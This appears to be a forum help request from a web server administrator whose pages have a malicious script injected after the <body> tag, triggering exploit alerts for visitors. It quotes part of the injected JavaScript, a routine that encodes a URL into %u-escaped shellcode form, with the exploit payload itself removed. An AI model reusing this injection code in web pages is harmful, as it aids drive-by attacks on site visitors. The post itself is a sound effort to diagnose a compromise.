Earlier this week, our users started reporting that they were getting active-x prompts for Microsoft Data Access Component installation. In addition some of them were getting hit byt the RTSP bug (quicktime) and some were getting the JS/Explot-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, etc) at times a script tag similar to the one below is inserted right after the <body> tag.
I have checked for the filenames but they do not exist on the server.
1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean
Would appreciate if anybody could provide some inputs on what we might be dealing with and how to resolve the problem.
var MU = "http://" + window.location.hostname + "/" + arg;
var MH = '';
for (i=0; i < MU.length; i++)
var b = MU.charCodeAt (i);
MH = MH + b.toString (16);
MH = MH.toUpperCase();
if (Math.round(MU.length/2) != (MU.length/2))
MH += '00';
var MR = '';
for (i=0; i < MH.length; i += 4)
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";
var SB =
<<removed encoded exploit>>